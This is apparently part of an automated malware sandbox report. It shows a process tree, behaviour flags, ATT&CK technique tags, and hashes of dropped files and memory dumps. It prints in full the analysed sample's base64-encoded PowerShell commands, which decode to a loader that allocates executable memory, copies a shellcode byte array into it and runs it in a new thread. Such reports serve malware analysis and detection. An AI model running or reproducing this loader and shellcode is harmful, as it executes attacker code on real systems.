LAAwAHgAZgAyACwAMAB4AGQAMwAsADAAeABkADYALAAwAHgANwBhACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgANQAzACwAMAB4AGMAMwAsADAAeABjAGYALAAwAHgAYgBkACwAMAB4ADYAMwAsADAAeAAxAGUALAAwAHgAYgBjACwAMAB4ADkAMgAsADAAeABjADgALAAwAHgAZgAyACwAMAB4ADEANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA4ADEALAAwAHgAMAA3ACwAMAB4AGUAMwAsADAAeAAyAGUALAAwAHgAMwA0ACwAMAB4ADMANwAsADAAeAA2AGUALAAwAHgAYwA3ACwAMAB4ADUAZgAsADAAeAAzAGYALAAwAHgAOAAyACwAMAB4AGUANwAsADAAeAA5AGYALAAwAHgANQA3ACwAMAB4AGUAMQAsADAAeAAxADcALAAwAHgAYQBhACwAMAB4ADQANwAsADAAeAAxADYALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABmADIALAAwAHgAMgA0ACwAMAB4AGMANQAsADAAeABkADUALAAwAHgANAA5ACwAMAB4ADEANAAsADAAeAA0ADAALAAwAHgAZQA5ACwAMAB4ADYANAAsADAAeAAzADMALAAwAHgAMgBkACwAMAB4ADcAZAAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAZAAsADAAeAA3AGQALAAwAHgAZQBlACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgAMwBkACwAMAB4AGUAZQAsADAAeAA4ADcALAAwAHgAYwA1ACwAMAB4AGUANQAsADAAeAA0AGEALAAwAHgANwA0ACwAMAB4AGYAMwAsADAAeABlADkALAAwAHgANAA3ACwAMAB4AGUAOAAsADAAeABhADgALAAwAHgANAA2ACwAMAB4AGUAZQAsADAAeABlADgALAAwAHgAMQA4ACwAMAB4ADAAMQAsADAAeABmADAALAAwAHgAZAA2ACwAMAB4AGEANgAsADAAeABkADEALAAwAHgAYQAzACwAMAB4ADQAMAAsADAAeABjAGYALAAwAHgAYwAzACwAMAB4AGQANQAsADAAeABlADQALAAwAHgAZQBkACwAMAB4ADEAYgAsADAAeAAwAGMALAAwAHgANwAzACwAMAB4ADMAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGYANwAsADAAeABiADUALAAwAHgANQA5ACwAMAB4AGIAOAAsADAAeAA4AGQALAAwAHgANwBhACwAMAB4ADIAYwAsADAAeABkAGIALAAwAHgAZAA2ACwAMAB4AGIAOQAsADAAeAA5ADAALAAwAHgAYwBiACwAMAB4ADgAZQAsADAAeABjADIALAAwAHgAZAAwACwAMAB4AGYANAAsADAAeAA2ADAALAAwAHgAMAA0ACwAMAB4ADEAZAAsADAAeAAyADQALAAwAHgAYgAyACwAMAB4ADQAMAAsADAAeAA1ADkALAAwAHgAMQA2ACwAMAB4ADgANQAsADAAeAA5ADQALAAwAHgAYgA3ACwAMAB4ADUANwAsADAAeABkADcALAAwAHgAZABkACwAMAB4AGMANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAdQBTAGwAawA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdQBTAGwAawAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdQBTAGwAawAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEYAcwBzACkAKQA7ACQAWgBmAEUAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBXAG0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAZQBXAG0AIAAkAFoAZgBFACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFoAZgBFACAAJABlACIAOwB9AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABzAHUAawAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAdQBrACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkADUALAAwAHgAYgBhACwAMAB4ADQANwAsADAAeAA1AGYALAAwAHgANwA5ACwAMAB4ADYANwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAA4ADMALAAwAHgAZQBlACwAMAB4AGYAYwAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEANgAsADAAeAAwADMALAAwAHgANQA2ACwAMAB4ADEANgAsADAAeABlADIALAAwAHgAYgAyACwAMAB4AGEAMwAsADAAeAA5ADEALAAwAHgAZQA4ACwAMAB4ADMAYwAsADAAeAA1AGMALAAwAHgANgAyACwAMAB4ADkANwAsADAAeAAwAGQALAAwAHgAOABlACwAMAB4ADAANgAsADAAeABkAGMALAAwAHgAMwBmACwAMAB4ADEAZQAsADAAeAA0AGMALAAwAHgAYgAwACwAMAB4AGIAMwAsADAAeABkADUALAAwAHgAMAAwACwAMAB4ADIAMQAsADAAeAA0ADIALAAwAHgAMABjACwAMAB4ADkANQAsADAAeABiADYALAAwAHgAZABmACwAMAB4AGIAZAAsADAAeABmAGUALAAwAHgANAA3ACwAMAB4ADYAOAAsADAAeAAwAGIALAAwAHgAZAA5ACwAMAB4ADYANgAsADAAeAA1ADYALAAwAHgAMgAwACwAMAB4ADEAOQAsADAAeABlADgALAAwAHgAMgBhACwAMAB4ADMAYgAsADAAeAA0AGUALAAwAHgAYwBhACwAMAB4ADEAMwAsADAAeABmADQALAAwAHgAOAAzACwAMAB4ADAAYgAsADAAeAA1ADQALAAwAHgANAAyACwAMAB4AGUAOQAsADAAeABlADQALAAwAHgAMAA4ACwAMAB4ADAAMgAsADAAeAA5AGEALAAwAHgAYQA5ACwAMAB4AGIAYwAsADAAeAAyADcALAAwAHgAZABlACwAMAB4ADcAMQAsADAAeABiAGQALAAwAHgAZQA3ACwAMAB4ADUANAAsADAAeABjADkALAAwAHgAYwA1ACwAMAB4ADgAMgAsADAAeABhAGIALAAwAHgAYgBlACwAMAB4ADcAOQAsADAAeAA4AGMALAAwAHgAZgBiACwAMAB4ADYAZgAsADAAeAAwAGEALAAwAHgAYwA2ACwAMAB4AGUAMwAsADAAeAAwADQALAAwAHgANQA0ACwAMAB4AGYANwAsADAAeAAxADIALAAwAHgAYwA4ACwAMAB4AGUAMQAsADAAeAAzAGUALAAwAHgANgAwACwAMAB4AGQAMgAsADAAeABhADAALAAwAHgANABiACwAMAB4AGIAZAAsADAAeABhADEALAAwAHgAMAAzACwAMAB4AGIAMwAsADAAeABiAGYALAAwAHgANgAzACwAMAB4ADUAMgAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4ADQANAAsADAAeAA5ADkALAAwAHgAYQA3ACwAMAB4ADgAMwAsADAAeAA5AGMALAAwAHgAOQA5ACwAMAB4ADUANwAsADAAeABmADYALAAwAHgAZAA2ACwAMAB4AGQAYQAsADAAeABlAGEALAAwAHgAMAAxACwAMAB4ADIAZAAsADAAeABhADEALAAwAHgAMwAwACwAMAB4ADgANwAsADAAeABiADIALAAwAHgAMAAxACwAMAB4AGIAMgAsADAAeAAzAGYALAAwAHgAMQA3ACwAMAB4AGIAMAAsADAAeAAxADcALAAwAHgAZAA5ACwAMAB4AGQAYwAsADAAeABiAGUALAAwAHgAZABjACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgAYQAyACwAMAB4AGUAMwAsADAAeAA2ADIALAAwAHgAYgAwACwAMAB4AGQAZQAsADAAeAA2ADgALAAwAHgAOAA1ACwAMAB4ADEANwAsADAAeAA1ADcALAAwAHgAMgBhACwAMAB4AGEAMgAsADAAeABiADMALAAwAHgAMwBjACwAMAB4AGUAOAAsADAAeABjAGIALAAwAHgAZQAyACwAMAB4ADkAOAAsADAAeAA1AGYALAAwAHgAZgAzACwAMAB4AGYANQAsADAAeAA0ADQALAAwAHgAMwBmACwAMAB4ADUAMQAsADAAeAA3AGQALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeABlADUALAAwAHgANwBlACwAMAB4ADcAOQAsADAAeAA1ADcALAAwAHgAYgBiACwAMAB4AGUAOAAsADAAeABlAGIALAAwAHgAYwBkACwAMAB4ADMAMAAsADAAeABlADkALAAwAHgAOQBiACwAMAB4ADcAYQAsADAAeABkADAALAAwAHgAOAA3ACwAMAB4ADMAMgAsADAAeABkADEALAAwAHgANABhACwAMAB4ADEANAAsADAAeABiADMALAAwAHgAZgBmACwAMAB4ADgAZAAsADAAeAA1AGIALAAwAHgAZQBlACwAMAB4ADMAMQAsADAAeAA0ADkALAAwAHgAZgAwACwAMAB4ADQAMwAsADAAeAA2ADEALAAwAHgAMwBlACwAMAB4AGEANAAsADAAeAAwAGIALAAwAHgAYgBmACwAMAB4ADkANgAsADAAeAAzADMALAAwAHgANgBjACwAMAB4ADQAMAAsADAAeABjADMALAAwAHgAOQA3ACwAMAB4ADIAMQAsADAAeABkADUALAAwAHgAZQBmACwAMAB4ADQANAAsADAAeAA5ADYALAAwAHgANAAxACwAMAB4ADYAMAAsADAAeAA3ADUALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADEAOAAsADAAeAA5ADIALAAwAHgANgA4ACwAMAB4ADEANAAsADAAeAA0AGQALAAwAHgAYwBiACwAMAB4ADUAYQAsADAAeAAwADAALAAwAHgAMAA3ACwAMAB4AGIAYwAsADAAeABiADcALAAwAHgAYgBkACwAMAB4ADgAMwAsADAAeAAyADYALAAwAHgAYQA5ACwAMAB4ADYAOQAsADAAeAA2ADcALAAwAHgAZgBkACwAMAB4ADYAMAAsADAAeABlADEALAAwAHgANABlACwAMAB4ADQAMwAsADAAeAAwADIALAAwAHgAMwA0ACwAMAB4AGMAMAAsADAAeAAxADIALAAwAHgAZAA1ACwAMAB4ADQAMwAsADAAeAAxADEALAAwAHgAZQBmACwAMAB4ADIAYwAsADAAeABlADAALAAwAHgANgA5ACwAMAB4ADAAZgAsADAAeAAxAGYALAAwAHgAOQAwACwAMAB4AGQAZQAsADAAeAA4ADYALAAwAHgAMAAwACwAMAB4AGEANgAsADAAeAAxAGYALAAwAHgANABkACwAMAB4AGIANwAsADAAeABlADEALAAwAHgAOABjACwAMAB4ADAANgAsADAAeABjADgALAAwAHgAZABmACwAMAB4AGQAYQAsADAAeAA1ADMALAAwAHgAOQBiACwAMAB4ADQAYwAsADAAeAA0ADkALAAwAHgAMABiACwAMAB4ADQAZgAsADAAeAAyADUALAAwAHgAMAA1ACwAMAB4ADUAOAAsADAAeAAzAGEALAAwAHgAZQA3ACwAMAB4AGUAZQAsADAAeAA2ADEALAAwAHgAMQAwACwAMAB4ADYAMQAsADAAeAA3AGEALAAwAHgAOQA0ACwAMAB4AGMANAAsADAAeABlADYALAAwAHgAZgBhACwAMAB4ADkAYgAsADAAeABmAGEALAAwAHgAZgA2ACwAMAB4ADcAMwAsADAAeAAzAGIALAAwAHgAOQAwACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAZAA2ACwAMAB4ADcAYQAsADAAeABhAGQALAAwAHgAYgBiACwAMAB4ADUAMwAsADAAeABjADMALAAwAHgAYwBmACwAMAB4AGIAZAAsADAAeAA2ADMALAAwAHgAMQBlACwAMAB4AGIAYwAsADAAeAA5ADIALAAwAHgAYwA4ACwAMAB4AGYAMgAsADAAeAAxADUALAAwAHgANwBjACwAMAB4AGMAMgAsADAAeABmADIALAAwAHgAOAAxACwAMAB4ADAANwAsADAAeABlADMALAAwAHgAMgBlACwAMAB4ADMANAAsADAAeAAzADcALAAwAHgANgBlACwAMAB4AGMANwAsADAAeAA1AGYALAAwAHgAMwBmACwAMAB4ADgAMgAsADAAeABlADcALAAwAHgAOQBmACwAMAB4ADUANwAsADAAeABlADEALAAwAHgAMQA3ACwAMAB4AGEAYQAsADAAeAA0ADcALAAwAHgAMQA2ACwAMAB4ADAAMgAsADAAeAA5AGEALAAwAHgAZgAyACwAMAB4ADIANAAsADAAeABjADUALAAwAHgAZAA1ACwAMAB4ADQAOQAsADAAeAAxADQALAAwAHgANAAwACwAMAB4AGUAOQAsADAAeAA2ADQALAAwAHgAMwAzACwAMAB4ADIAZAAsADAAeAA3AGQALAAwAHgAOAA2ACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgANwBkACwAMAB4AGUAZQAsADAAeABkADQALAAwAHgAYQBkACwAMAB4ADMAZAAsADAAeABlAGUALAAwAHgAOAA3ACwAMAB4AGMANQAsADAAeABlADUALAAwAHgANABhACwAMAB4ADcANAAsADAAeABmADMALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeABlADgALAAwAHgAYQA4ACwAMAB4ADQANgAsADAAeABlAGUALAAwAHgAZQA4ACwAMAB4ADEAOAAsADAAeAAwADEALAAwAHgAZgAwACwAMAB4AGQANgAsADAAeABhADYALAAwAHgAZAAxACwAMAB4AGEAMwAsADAAeAA0ADAALAAwAHgAYwBmACwAMAB4AGMAMwAsADAAeABkADUALAAwAHgAZQA0ACwAMAB4AGUAZAAsADAAeAAxAGIALAAwAHgAMABjACwAMAB4ADcAMwAsADAAeAAzADEALAAwAHgAOQA3ACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAYgA1ACwAMAB4ADUAOQAsADAAeABiADgALAAwAHgAOABkACwAMAB4ADcAYQAsADAAeAAyAGMALAAwAHgAZABiACwAMAB4AGQANgAsADAAeABiADkALAAwAHgAOQAwACwAMAB4AGMAYgAsADAAeAA4AGUALAAwAHgAYwAyACwAMAB4AGQAMAAsADAAeABmADQALAAwAHgANgAwACwAMAB4ADAANAAsADAAeAAxAGQALAAwAHgAMgA0ACwAMAB4AGIAMgAsADAAeAA0ADAALAAwAHgANQA5ACwAMAB4ADEANgAsADAAeAA4ADUALAAwAHgAOQA0ACwAMAB4AGIANwAsADAAeAA1ADcALAAwAHgAZAA3ACwAMAB4AGQAZAAsADAAeABjADcAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHUAUwBsAGsAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHUAUwBsAGsALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHUAUwBsAGsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2772
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\veodagwk.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2144
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE6C7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE6C6.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESE6C7.tmp

Filesize
1KB

MD5
e4d173c224c12c2dd63e4cae01453d2b

SHA1
a228f2e783fad70057b10dd713b62efb2a0996c5

SHA256
2dbf503383eb06f338585303d621c386a970683a088b1ebc2ff4f6327d0c70ea

SHA512
c53a4c9de5f32169cc82f1cc46204a0cc03d112dcabbf502157959827fbd5b1cf8514ee0f871fa17e18b6296e3ead43e846029be748f1e50d5422c5d83060bba

Download Submit
C:\Users\Admin\AppData\Local\Temp\veodagwk.dll

Filesize
3KB

MD5
cb5a3440a1732acfeca46856734c32f6

SHA1
becf174196bc98270ebc4bfd20091f30dd900514

SHA256
b523c92ad1c23eb304c8673d5e9c657451ea9cfdb2b2561379114a918769defc

SHA512
03df7efbd119f63b2fb9611daff8ca2146d3c2b564c148b9a05a2a9d39a20b28ffd993ae198a71869c0dde3a3bb8228fa1f20fde73bffab159f9c0536c2bdb0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\veodagwk.pdb

Filesize
7KB

MD5
a10494cf1220efc7befaae2a9b03596e

SHA1
700398922945491a2f9489414c9f6b7e64f81b98

SHA256
66e06cd81b5593bfba1fc24b8a74f4ae7babb380fbb6fbf94db566d1ae27f58c

SHA512
55a489ea2b6db507f94f9cb7dbac3ba90a7ad8ca9d2cc84d2175dd5f5ebf6ae52e394065d69b2911c699110da02fd0d003c6fc4275d40789f626546046c523fb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
33214c84404c96ff49c61ac7a2afb59b

SHA1
4ec0b9e237067f22d432ffe04da540a8c8ddbb5b

SHA256
40e991ee3b6dda659635e937fd7a67f3ccc57e4d22d48d3187cd5b9de09f80a1

SHA512
e1baed741a58e59f8e5d1241716f447df9fdd8c9d57137aaaa449edfc43d73f8895098ace5770a260c8f7422c6e548560d19926d4aed3ffa189b01619f2d7cd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE6C6.tmp

Filesize
652B

MD5
965feb4c1b135b80980f4897a099989a

SHA1
880e6c7bbd8c1029ee3a70487ce78f71f071fad7

SHA256
cafbf077a98dd318d1db75a92d06bc340af53283fbc59e0b1048c8641747a267

SHA512
b82f5c50760f7f565fd210e1f7237bbab539766348d2860d3d1bda9e9ca9495c03c858bc3a67a42356df93c5840b0d722edc6c48d0cf04369b2efa12ec3ecda5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\veodagwk.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\veodagwk.cmdline

Filesize
309B

MD5
cd4c12444529e5f5af8e413cc90c48af

SHA1
ca88a743e07f5a147242f5b21197f73eaeac06ad

SHA256
413e0e23a5f8fc5e716db548836e8e7ad7b24df4cfaa5997f604048b1f7529d5

SHA512
5c9ee13023a992c1e226792cb1ab0c6839fd6c138c74ae66363ada0644394f7be454fa9488204b4a0427a3d7be02aa04e3cedaea18b0ef7703bbbac2f50a99fb

Download Submit
memory/2300-17-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-43-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/2432-8-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/2432-4-0x000007FEF5ABE000-0x000007FEF5ABF000-memory.dmp

Filesize
4KB

Download
memory/2432-9-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/2432-7-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

Filesize
32KB

Download
memory/2432-11-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/2432-5-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2432-6-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/2432-41-0x000007FEF5ABE000-0x000007FEF5ABF000-memory.dmp

Filesize
4KB

Download
memory/2432-42-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/2432-10-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/2772-40-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads